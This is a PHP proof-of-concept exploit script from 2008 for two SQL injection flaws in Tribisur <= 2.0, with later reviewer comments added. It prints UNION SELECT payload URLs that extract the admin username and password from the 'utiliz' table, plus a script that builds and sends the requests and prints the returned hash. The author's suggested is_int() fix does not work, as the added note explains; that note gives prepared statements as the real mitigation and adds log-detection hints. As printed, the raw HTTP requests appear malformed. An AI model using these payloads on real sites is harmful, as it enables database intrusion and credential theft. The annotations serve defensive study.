
tribisur-sql.txt

Posted on 06 January 2008

#!/usr/bin/php -q
<?php
// Historical (2008) proof-of-concept for two SQL injection flaws in Tribisur <= 2.0.
// Kept here for the defensive lesson: both bugs come from concatenating a request
// parameter straight into an SQL string, and the author's suggested "Fix" below
// (is_int() on the parameter) does not work -- see the reviewer note inside the
// comment block.
echo "[*]Tribisur <= 2.0 Remote SQL Injection Exploit ";
echo "[*]Coded by x0kster -x0kster[AT]gmail[DOT]com - ";
/*
Script Download : http://www.comscripts.com/scripts/php.tribisur-20.1211.html

Bug #1 in modules/forum/liste.php :
First, this bugged page is included through forum.php :
<?php //forum.php
[...]
34. if($action == "liste") {
35. include ("./modules/forum/liste.php");
36. }
[...]
?>
And now the bugged code :-) :
<?php //liste.php
[...]
5. $select = 'SELECT * FROM categorie_du_forum WHERE id='.$cat.' ';
6. $result = mysql_query($select,$link) or die ('Erreur : '.mysql_error() );
7. $total = mysql_num_rows($result);
[...]
?>
So we can exploit it with this simple PoC:
forum.php?action=liste&cat=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0,0,0+from+utiliz+where+id=1

Bug #2 in cat_main.php :
<?php //cat_main.php
[...]
32. $select3 = 'SELECT * FROM menu WHERE valider="oui" AND id='.$id.' ';
33. $result3 = mysql_query($select3,$link) or die ('Erreur : '.mysql_error() );
34. $total3 = mysql_num_rows($result3);
[...]
?>
So like the first we can exploit it with:
cat_main.php?id=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0+from+utiliz+where+id=1

Fix :
<?php //liste.php
[...]
5. if(!is_int($cat)){ die("Hacking Attempt"); }
6. $select = 'SELECT * FROM categorie_du_forum WHERE id='.$cat.' ';
7. $result = mysql_query($select,$link) or die ('Erreur : '.mysql_error() );
8. $total = mysql_num_rows($result);
[...]
?>
<?php //cat_main.php
[...]
32. if(!is_int($id)){ die("Hacking Attempt"); }
33. $select3 = 'SELECT * FROM menu WHERE valider="oui" AND id='.$id.' ';
34. $result3 = mysql_query($select3,$link) or die ('Erreur : '.mysql_error() );
35. $total3 = mysql_num_rows($result3);
[...]
?>

Reviewer note on the "Fix" above: it does not fix the injection. $cat and $id are
request parameters (the quoted code reads them as bare globals, so presumably via
register_globals), and PHP delivers request values as strings; is_int("5") is false,
so the added guard would die("Hacking Attempt") on every request, legitimate or not --
a functional break rather than a mitigation. The root cause is the string-built
query. Correct mitigation: bind the id as a parameter of a prepared statement
(mysqli/PDO), or at minimum validate/cast before concatenation, e.g.
$cat = (int) $cat; or reject when filter_var($cat, FILTER_VALIDATE_INT) === false.
Detection: the probe built below is easy to recognise in web-server or WAF logs by
"union select" and a hex literal inside an id parameter that normally holds a small
integer.

Exploit :
*/
if ($argc<4) {
echo "[*]Usage: php ".$argv[0]." host path mode ";
echo "[*]Mode: 1 -SQL Injection in cat_main.php- ";
echo " 2 -SQL Injection in modules/forum/liste.php- ";
echo "[*]Example: ";
echo "[*]php ".$argv[0]." 
localhost /tribusur/ 1 ";
die;
}

/**
 * Sends one raw HTTP request to $host on port 80 and stores the whole reply in
 * the global $response (no return value; output is by side effect).
 *
 * Reads $host from the global scope. fsockopen() is called without a timeout,
 * so an unresponsive host can block the script; if the name does not resolve,
 * gethostbyname() hands the name through unchanged and fsockopen() fails, in
 * which case the function prints an error and exits. The reply is read with
 * fgets() until EOF.
 */
function get_response($packet){
global $host, $response;
$socket=fsockopen(gethostbyname($host),80);
if (!$socket) { echo "[-]Error contacting $host. "; exit();}
fputs($socket,$packet);
$response='';
while (!feof($socket)) { $response.=fgets($socket); }
fclose($socket);
}

$host =$argv[1];
$path =$argv[2];
$mode =$argv[3];
// Each mode hand-builds the raw request. NOTE(review): as printed on this page the
// request line carries no HTTP version and the header lines end in a plain space
// rather than CRLF -- this looks like the original line terminators were lost when
// the file was extracted, so these literals are not a well-formed HTTP request as-is.
if($mode == "1"){
$packet ="GET ".$path."cat_main.php?id=-1+union+select+0,concat(0x78306b73746572,passe,0x78306b73746572),0,0,0,0,0,0+from+utiliz+where+id=1/*";
$packet.="Host: ".$host." ";
$packet.="Connection: Close ";
}elseif($mode == "2"){
$packet ="GET ".$path."forum.php?action=liste&cat=-1+union+select+0,concat(0x78306b73746572,passe,0x78306b73746572),0,0,0,0,0,0,0,0+from+utiliz+where+id=1/*";
$packet.="Host: ".$host." ";
$packet.="Connection: Close ";
}else{
echo "[-]Incorrect Mode. ";
die;
}
get_response($packet);
// 0x78306b73746572 is the hex encoding of "x0kster". The script looks for that marker
// in the reply and prints whatever the server returned between its first two
// occurrences ($hash[1]; the explode limit of 32 caps the number of pieces). No marker
// in the reply is treated as "not vulnerable / already fixed".
if(strstr($response,"x0kster")){
$hash = explode("x0kster",$response,32);
echo "[+]Ok, the admin hash is : $hash[1] ";
die;
}else{
echo "[-]Exploit filed, maybe fixed? ";
die;
}
?>

 
